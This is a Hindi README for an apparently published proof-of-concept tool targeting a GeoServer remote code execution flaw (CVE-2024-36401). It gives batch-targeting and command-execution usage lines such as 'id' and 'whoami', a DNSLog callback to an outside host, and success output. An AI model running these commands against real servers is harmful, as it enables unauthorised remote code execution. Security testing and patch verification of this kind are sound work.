
यह स्क्रिप्ट GeoServer में रिमोट कोड एक्जीक्यूशन भेद्यता (CVE-2024-36401) के लिए विकसित एक PoC (Proof of Concept) डिटेक्शन टूल है। यह भेद्यता हमलावर को विशिष्ट अनुरोध बनाकर लक्ष्य सर्वर पर मनमानी कमांड निष्पादित करने की अनुमति देती है।
⚠️ अस्वीकरण: यह उपकरण केवल सुरक्षा अनुसंधान और कानूनी रूप से अधिकृत परीक्षण के लिए है, कृपया अवैध उद्देश्यों के लिए उपयोग न करें। उपयोगकर्ता स्वयं कानूनी जिम्मेदारी वहन करेगा।
README संस्करण: [अंग्रेज़ी | चीनी]
यह स्क्रिप्ट GeoServer के लिए रिमोट कोड एक्सीक्यूशन भेद्यता (CVE-2024-36401) के लिए विकसित एक PoC (Proof of Concept) डिटेक्शन टूल है। यह भेद्यता हमलावर को विशेष अनुरोध बनाकर लक्ष्य सर्वर पर मनमानी कमांड निष्पादित करने की अनुमति देती है।
कृपया सुनिश्चित करें कि आपके रनटाइम वातावरण में निम्नलिखित निर्भरताएँ स्थापित हैं:
requestslxmlनिम्नलिखित कमांड का उपयोग करके आवश्यक निर्भरताएँ स्थापित की जा सकती हैं:
pip install requests lxml
python poc.py -u http://target.com -d dnslog.example.com
या निष्पादित करने के लिए कमांड निर्दिष्ट करें:
python poc.py -u http://target.com -c "touch /tmp/vulntest"
एकाधिक लक्ष्य URL वाली एक टेक्स्ट फ़ाइल तैयार करें (प्रति पंक्ति एक):
python poc.py -uf targets.txt -d dnslog.example.com
या कमांड निर्दिष्ट करें:
python poc.py -uf targets.txt -c "id"
विस्तृत उपयोग निर्देश: विस्तृत उपयोग निर्देश दस्तावेज़
⚠️ ध्यान दें:
-dऔर-cपैरामीटर एक साथ उपयोग नहीं किए जा सकते।
[INFO] 爬取到3个有效的 Typenames,开始漏洞探测
[INFO] 目标: http://example.com
[INFO] 执行命令: whoami
[INFO] DNSLOG地址:
[INFO] 正在尝试 typeName: topp:states -> whoami
[+] 命令疑似成功执行!目标: http://example.com 命令: whoami
-c पैरामीटर का उपयोग करके कमांड निष्पादित करने का समर्थन करता है।/geoserver/wfs इंटरफ़ेस के एक्सेस स्रोतों को सीमित करने के लिए फ़ायरवॉल कॉन्फ़िगर करें।इस परियोजना को बेहतर बनाने में मदद करने के लिए Issue या Pull Request सबमिट करने का स्वागत है।
यह परियोजना MIT लाइसेंस के तहत है, आप स्वतंत्र रूप से संशोधित, वितरित और व्यावसायिक उपयोग कर सकते हैं, लेकिन कॉपीराइट नोटिस बनाए रखना होगा।
| पैरामीटर | विवरण |
|---|
-u, --url | एकल लक्ष्य पता निर्दिष्ट करें |
-uf, --url-file | एकाधिक लक्ष्य URL वाली फ़ाइल पथ निर्दिष्ट करें |
-d, --dnslog | DNSLog पता निर्दिष्ट करें |
-c, --command | लक्ष्य प्रणाली पर निष्पादित करने के लिए कमांड निर्दिष्ट करें (जैसे: whoami, id, curl आदि) |